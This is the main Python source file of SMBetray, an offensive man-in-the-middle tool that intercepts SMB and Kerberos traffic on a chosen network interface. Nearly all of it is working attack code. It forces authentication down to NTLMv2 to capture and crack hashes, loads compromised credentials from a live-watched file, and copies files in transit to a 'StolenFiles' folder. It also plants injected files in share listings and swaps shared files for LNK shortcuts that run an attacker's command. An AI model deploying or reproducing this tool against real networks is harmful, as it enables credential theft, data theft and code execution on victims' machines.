#!/usr/bin/python
import argparse
from binascii import hexlify, unhexlify
import logging
from impacket.examples import logger
import os
# For sharing data across threads
from multiprocessing import Manager, Queue
from threading import Lock, Thread
import copy
#
from lib import ebcLib
from lib.SMB1_Lib import SMB1_Lib
from lib.SMB2_Lib import SMB2_Lib
from lib.K2TKerb import K2TKerb
from lib.SMB_Core import PoppedCreds
from impacket.smb3structs import SMB2Packet, SMB2Read_Response
from impacket.nmb import NetBIOSSessionPacket
from hashlib import md5
import re
import time
# Colors
from lib.bcolors import bcolors
# Logger, for easy output when dealing with threads
logger.init()
logging.getLogger().setLevel(logging.INFO)
class AttackConfig(object):
DIALECT_DOWNGRADE = False
AUTHMECH_DOWNGRADE = False
AUTHMECH_DOWNGRADE_K311 = False
POPPED_CREDS_FILE = None
PASSIVE_OUTPUT_DIR = None
INJECT_FILES_DIR = None
HASH_OUTPUT_FILE = None
LNK_SWAP_ALL = None
LNK_SWAP_EXEC_ONLY = None
EXTENSION_SWAP_DIR = None
FILENAME_SWAP_DIR = None
# This just live-monitors the file
# holding compromised credentials, and
# loads them into a shared memory object
# so that SMBetray/K2TKerb can use them
# to break keys. One set of creds per line.
#
# [FILE FORMAT] domain/username and password are seperated by a single space. " "
#
# DOMAIN/Username password
# or
# DOMAIN/Username aad3b435b51404eeaad3b435b51404ee:39c0d0c980e8dde6cc31edc4a74cd914
#
class CredFileWatcher(Thread):
def __init__(self, credFile, poppedCredsDB, poppedCredsDB_Lock):
self.credFile = credFile
self.poppedCredsDB = poppedCredsDB
self.poppedCredsDB_Lock = poppedCredsDB_Lock
self.suicide = False
super(CredFileWatcher, self).__init__()
# Called by the parent Thread class "start" function
def run(self):
oldHash = "firstRun"
logging.info("[CredFileWatcher] Watching " + self.credFile)
while True:
if(self.suicide):
return
m_handle = md5()
m_handle.update(open(self.credFile, "r").read())
newHash = m_handle.digest()
if(newHash != oldHash):
# File has been changed
oldHash = newHash
for line in open(self.credFile, "r"):
try:
# Reset
ntHash = False
line = line.replace("\n", "").replace("\r", "")
domain = line.split("/")[0]
username = line.split("/")[1].split(" ")[0]
password = line[line.find(" ")+1:]
popped = PoppedCreds(username, password, domain)
# If we're given an LM:NT hash (eg. aad3b435b51404eeaad3b435b51404ee:be692b029663e38fa07d13e3228cf0be)
if(len(re.findall(r'^\w{32}:\w{32}$', password)) > 0):
ntHash = True
del(popped)
popped = PoppedCreds(username = username, domain = domain, lm_hash = unhexlify(password[password.find(" ")+1:password.find(":")]), nt_hash = unhexlify(password[password.find(":")+1:]))
# Check if it's already in the DB
if(hash(popped) not in self.poppedCredsDB.keys()):
self.poppedCredsDB_Lock.acquire()
try:
self.poppedCredsDB[hash(popped)] = copy.deepcopy(popped)
logging.info("[CredFileWatcher] Loaded creds of " + popped.domain + "/" + popped.username)
except Exception, e:
logging.error("[CredFileWatcher::watch] " + str(e))
pass
self.poppedCredsDB_Lock.release()
except Exception, e:
logging.error("[CredFileWatcher::watch] " + str(e))
continue
time.sleep(.5)
# If the timeout == -1, then this does nothing
# otherwise, it initiates the shutdown
def join(self, timeout = None):
if timeout == -1:
return
self.suicide = True
super(CredFileWatcher, self).join(timeout)
# This is the grand controller. It's just a mainly empty
# router that:
# 1. Compiles split-up netbios packets, and
# 2. Passes the packet to the appropriate library(
# (SMB2/3 packets to SMB2_Lib, SMB1 packets to SMB1_Lib)
class SMBetray(ebcLib.MiTMModule):
# This function is called by the MiTMModule.__init__
def setup(self):
self.SMBTool = None
# This is a make-shift solution to SMB messages that get broken up, such as
# read responses which may be broken down to 1500 bytes per message.
self.SRV_INCOMPLETE_MESSAGE = False
self.SRV_MESSAGE_DATA = ""
self.SRV_MESSAGE_LENGTH = 0
self.CLT_INCOMPLETE_MESSAGE = False
self.CLT_MESSAGE_DATA = ""
self.CLT_MESSAGE_LENGTH = 0
pass
# Modify the raw data sent from the client to the server
def parseClientRequest(self, request):
SMB1_Header = '\xff\x53\x4d\x42'
SMB2_Header = '\xfe\x53\x4d\x42'
# If we're in the middle of compiling the data from one very large split up packet, continue to do so
if(self.CLT_INCOMPLETE_MESSAGE):
self.CLT_MESSAGE_DATA += request
if(len(self.CLT_MESSAGE_DATA) == self.CLT_MESSAGE_LENGTH):
request = str(self.CLT_MESSAGE_DATA)
self.CLT_MESSAGE_DATA = ""
self.CLT_MESSAGE_LENGTH = 0
self.CLT_INCOMPLETE_MESSAGE = False
else:
# We're still waiting for the remainder of this packet, so don't return a response, thus we hold off passing the request to the server
return
# Verify we got an SMB packet wrapped inside of a NetBIOS packet
try:
raw = NetBIOSSessionPacket(data = request)
if(len(str(request)) < raw.length):
self.CLT_INCOMPLETE_MESSAGE = True
self.CLT_MESSAGE_DATA = str(request)
self.CLT_MESSAGE_LENGTH = raw.length + 4
# Don't return a response, thus we hold off passing the request to the server
return
except Exception, e:
logging.debug("[SMBetray::parseClientRequest] " + str(e) + " " + traceback.format_exc())
return request
# Cool, now we've got the entire re-compiled packet.
# Now lets do something with it
# Handle SMBv1 packets
if(request[4:8] == SMB1_Header):
if(self.SMBTool.__class__.__name__ != 'SMB1_Lib'):
self.SMBTool = SMB1_Lib(self.info, self.MiTMModuleConfig)
return self.SMBTool.handleRequest(request)
# Handle SMBv2 packets
if(request[4:8] == SMB2_Header):
if(self.SMBTool.__class__.__name__ != 'SMB2_Lib'):
self.SMBTool = SMB2_Lib(self.info, self.MiTMModuleConfig)
return self.SMBTool.handleRequest(request)
# Else, pass it along
return request
# Modify the raw data sent from the server back to the client
def parseServerResponse(self, response):
SMB1_Header = '\xff\x53\x4d\x42'
SMB2_Header = '\xfe\x53\x4d\x42'
# If we're in the middle of compiling the data from one very large split up packet, continue to do so
if(self.SRV_INCOMPLETE_MESSAGE):
self.SRV_MESSAGE_DATA += response
if(len(self.SRV_MESSAGE_DATA) == self.SRV_MESSAGE_LENGTH):
response = str(self.SRV_MESSAGE_DATA)
self.SRV_MESSAGE_DATA = ""
self.SRV_MESSAGE_LENGTH = 0
self.SRV_INCOMPLETE_MESSAGE = False
else:
# Don't return a response, thus we hold off replying to the client
return
# Verify we got an SMB packet wrapped inside of a NetBIOS packet
try:
raw = NetBIOSSessionPacket(data = response)
if(len(str(response)) < raw.length):
self.SRV_INCOMPLETE_MESSAGE = True
self.SRV_MESSAGE_DATA = str(response)
self.SRV_MESSAGE_LENGTH = raw.length + 4
# Don't return a response, thus we hold off replying to the client
return
except Exception, e:
logging.debug("[SMBetray::parseServerResponse] " + str(e) + " " + traceback.format_exc())
return response
# Cool, now we've got the entire re-compiled packet.
# Now lets do something with it
# Handle SMBv1 packets
if(response[4:8] == SMB1_Header):
if(self.SMBTool.__class__.__name__ != 'SMB1_Lib'):
self.SMBTool = SMB1_Lib(self.info, self.MiTMModuleConfig)
return self.SMBTool.handleResponse(response)
# Handle SMBv2 packets
if(response[4:8] == SMB2_Header):
if(self.SMBTool.__class__.__name__ != 'SMB2_Lib'):
self.SMBTool = SMB2_Lib(self.info, self.MiTMModuleConfig)
return self.SMBTool.handleResponse(response)
# Else, pass it along
return response
VERSION = "1.0.0"
# Parse the commandline arguments
def parseCommandLine():
'''This function parses and return arguments passed in'''
# Assign description to the help doc
parser = argparse.ArgumentParser()
parser._optionals.title = "Standard arguments"
parser.add_argument('-I', metavar='IFACE', type=str, help='Interface to hijack connections on', required=True)
parser.add_argument('-v', '--verbose', action="store_true", help='Print verbose output', required=False)
connGroup = parser.add_argument_group('Authentication & protocol attacks')
connGroup.add_argument('--downgradeAuth', action="store_true", help='Attempt to downgrade authentication mechanisms to NTLMv2', required=False)
connGroup.add_argument('--K311', action="store_true", help='Try to downgrade SMB 3.1.1 to NTLMv2, even though the connection will be killed after auth (only good for capturing hashes)', required=False)
connGroup.add_argument('--creds', metavar='CREDFILE', default=None, type=str, help='A file containing usernames & passwords (or lm:ntlm hashes) for session key cracking, one-per line, formatted as "DOMAIN/USERNAME PASSWORD" or "DOMAIN/USERNAME lm:ntlm". This file is watched for live edits', required=False)
connGroup.add_argument('--hashOutputFile', metavar='OUTPUTFILE', default=None, type=str, help='Store captured NTLMv2 hashes in this file', required=False)
fileGroup = parser.add_argument_group('File Attacks')
fileGroup.add_argument('--injectFiles', metavar='DIRECTORY', default=None, type=str, help='Inject the files from the specified folder into every folder listing of the network share (useful for social engineering)', required = False)
fileGroup.add_argument('--lnkSwapAll', metavar='COMMAND', default=None, type=str, help='Replace every file shown (except folders) with a LNK with the same name to run the provided command', required=False)
fileGroup.add_argument('--lnkSwapExecOnly', metavar='COMMAND', default=None, type=str, help='Only replace every executable or lnk file shown (except folders) with a LNK with the same name to run the provided command', required=False)
fileGroup.add_argument('--extSwapDir', metavar='DIRECTORY', default=None, type=str, help='Swap out the contents of any file with extension X with the contents of the file in the provided directory with extension X')
fileGroup.add_argument('--nameFileSwap', metavar='DIRECTORY', default=None, type=str, help='Swap out the contents of a file sharing the same name as one of the files in the provided directory (eg the contents of the file Sample.xml is swapped out with contents of DIRECTORY/Sample.xml)')
utilGroup = parser.add_argument_group('Utilities')
utilGroup.add_argument('--passive', metavar='OUTPUTDIR', default=None, type=str, help='Passively copy files in cleartext to the provided directory', required=False)
# Array for all arguments passed to script
args = parser.parse_args()
if(args.verbose):
logging.getLogger().setLevel(logging.NOTSET)
config = dict()
config['interface'] = args.I
# build the AttackConfig for SMBetray to later parse
attackConf = AttackConfig()
attackConf.AUTHMECH_DOWNGRADE = args.downgradeAuth
attackConf.POPPED_CREDS_FILE = args.creds
attackConf.PASSIVE_OUTPUT_DIR = args.passive
attackConf.HASH_OUTPUT_FILE = args.hashOutputFile
attackConf.INJECT_FILES_DIR = args.injectFiles
attackConf.EXTENSION_SWAP_DIR = args.extSwapDir
attackConf.FILENAME_SWAP_DIR = args.nameFileSwap
attackConf.LNK_SWAP_ALL = args.lnkSwapAll
attackConf.LNK_SWAP_EXEC_ONLY = args.lnkSwapExecOnly
attackConf.AUTHMECH_DOWNGRADE_K311 = args.K311
if(args.lnkSwapAll != None and args.lnkSwapExecOnly != None):
logging.error("FATAL: Cannot use --lnkSwapAll and --lnkSwapExecOnly together")
exit(0)
config['SMBAttackConfig'] = attackConf
# The file to read/monitor for compromised creds to use for cracking SMB session keys
config['credFile'] = './compromisedCreds.txt'
# The directory to store passively captured files
config['stolenFilesOutputDir'] = './StolenFiles'
return config
# Prints that l337 banner
def printBanner():
z = "\n"
z += bcolors.OKBLUE + """##### ####### #### """+bcolors.FAIL+"""##### ##### ##### ##### # # \n"""+bcolors.ENDC
z += bcolors.OKBLUE + """# # # # # # """+bcolors.FAIL+"""# # # # # # # # \n"""+bcolors.ENDC
z += bcolors.OKBLUE + """##### # # # #### """+bcolors.FAIL+"""##### # #### ##### # \n"""+bcolors.ENDC
z += bcolors.OKBLUE + """ # # # # # # """+bcolors.FAIL+"""# # # # # # # \n"""+bcolors.ENDC
z += bcolors.OKBLUE + """##### # # # #### """+bcolors.FAIL+"""##### # # # # # # \n"""+bcolors.ENDC
z += "\n"
z += bcolors.TEAL + """SMBetray v"""+str(VERSION)+""" ebcLib v"""+str(ebcLib.VERSION)+bcolors.ENDC+"\n"
z += bcolors.WHITE + """@Quickbreach"""+bcolors.ENDC+"\n"
print(z)
def runAttack(config):
# The list that will contain all of the running MiTMServer threads
MiTMServers = []
fileWatcherThread = None
# Memory sharing across threads
sharedData = []
sharedData.append(Manager())
sharedData.append(Manager())
sharedData.append(Manager())
sharedData.append(Manager())
smbKeyChain = sharedData[0].dict() #Shared memory accross threads - this allows the K2TKerb module to share the session key with the SMBetray module
smbKeyChain_Lock = Lock() #To prevent multiple threads from accessing the smbKeyChain at the same time
kerbSessionSalts = sharedData[1].dict() #Shared memory accross threads - to give all K2TKerb threads access to the salts from PREAUTH-errors
kerbSessionKeys = sharedData[2].dict() #Shared memory accross threads - to give all K2TKerb threads access to the kerberos AS-REP session keys
poppedCredsDB = sharedData[3].dict() #Shared memory accross threads - to give all SMBetray modules access to the creds in the popped-creds file
poppedCredsDB_Lock = Lock() #Shared memory accross threads - to give all SMBetray modules access to the creds in the popped-creds file
kerbPoppedKeys = Queue()
# Watch the credential file for live edits
if(config['SMBAttackConfig'].POPPED_CREDS_FILE != None):
fileWatcherThread = CredFileWatcher(config['SMBAttackConfig'].POPPED_CREDS_FILE, poppedCredsDB, poppedCredsDB_Lock)
fileWatcherThread.start()
# Create the SMBetray module instance
smbetrayMod = SMBetray()
smbetrayMod.addCustomData(attackConfig = config['SMBAttackConfig'])
smbetrayMod.addCustomData(smbKeyChain = smbKeyChain)
smbetrayMod.addCustomData(smbKeyChain_Lock = smbKeyChain_Lock)
smbetrayMod.addCustomData(poppedCredsDB = poppedCredsDB)
smbetrayMod.addCustomData(poppedCredsDB_Lock = poppedCredsDB_Lock)
smbetrayMod.addCustomData(kerbPoppedKeys = kerbPoppedKeys)
# Create the Kerberos intercept server
kickToTheKerb = K2TKerb()
kickToTheKerb.addCustomData(attackConfig = config['SMBAttackConfig'])
kickToTheKerb.addCustomData(poppedCredsDB = poppedCredsDB)
kickToTheKerb.addCustomData(kerbPoppedKeys = kerbPoppedKeys)
# 445 SMB intercept
# 88 Kerberos intercept
MiTMServers.append(ebcLib.MiTMServer(139, "tcp", config['interface'], smbetrayMod, True))
MiTMServers.append(ebcLib.MiTMServer(445, "tcp", config['interface'], smbetrayMod, True))
MiTMServers.append(ebcLib.MiTMServer(88, "tcp", config['interface'], kickToTheKerb, False))
try:
logging.info("Starting intercept servers!")
for x in MiTMServers:
x.daemon = True
x.start()
while MiTMServers[-1].isAlive():
# the MiTMServer disregards '-1', so this join does nothing
MiTMServers[-1].join(-1)
except KeyboardInterrupt:
logging.info("Quitting....")
for z in MiTMServers:
z.join(0)
if(fileWatcherThread != None):
fileWatcherThread.join(0)
except Exception, e:
m = logging.error(str(traceback.format_exc()))
logging.error("Error: " + str(m))
if __name__ == "__main__":
# Print the banner
printBanner()
# Handle the commandline arguments
config = parseCommandLine()
# Command-line looked good, execute
runAttack(config)
#1. Generate the LNK files
#2. Generate the files for .dll, .exe, .msi, .war, .aspx, .asp, .jsp, .vbs, .vb, .bat, .com, .cmd, .ps1, .reg
#3. Read the cracked credentials file
#4.
# Grab Registry.pol
# Inject files
# LnkSwap
# Crack NTLMv2 keys